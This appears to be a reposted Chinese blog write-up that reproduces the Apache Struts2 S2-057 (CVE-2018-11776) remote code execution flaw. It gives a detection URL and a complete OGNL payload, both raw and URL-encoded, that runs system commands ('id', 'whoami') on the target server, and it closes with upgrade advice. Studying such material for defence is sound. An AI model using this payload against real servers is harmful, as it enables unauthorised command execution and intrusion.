我是靠谱客的博主 愤怒鞋垫,最近开发中收集的这篇文章主要介绍Struts2 S2-057远程执行代码漏洞(CVE-2018-11776)漏洞复现 漏洞防御,觉得挺不错的,现在分享给大家,希望可以做个参考。
概述
漏洞介绍
名称: struts2 代码执行 (CVE-2018-11776)
描述: Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。 action元素没有设置名称空间属性,或者使用了通配符名称空间将由用户从uri传递并解析为OGNL表达式,最终导致远程代码执行漏洞
影响版本
Struts 2.3.34,Struts 2.5.16
漏洞复现
访问靶机地址
http://ip:port/struts2-showcase/
构造payload访问
/struts2-showcase/$%7B233*233%7D/actionChain1.action
利用BurpSuite抓包并改包,可以看到,233X233的结果已经在Location头中返回,说明存在漏洞。
构造POC,替换掉请求内容
原始poc
${
(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}
url编码后的poc
/struts2-showcase/$%7B%0A%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27whoami%27%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23a.getInputStream%28%29%29%29%7D/actionChain1.action
漏洞防御
目前官方已发布最新版本来修复此漏洞,受影响的用户请尽快升级到Apache Struts 2.3.35 或Struts 2.5.17版
漏洞发现者的博客:https://lgtm.com/blog/apache_struts_CVE-2018-11776
最后
以上就是愤怒鞋垫为你收集整理的Struts2 S2-057远程执行代码漏洞(CVE-2018-11776)漏洞复现 漏洞防御的全部内容,希望文章能够帮你解决Struts2 S2-057远程执行代码漏洞(CVE-2018-11776)漏洞复现 漏洞防御所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复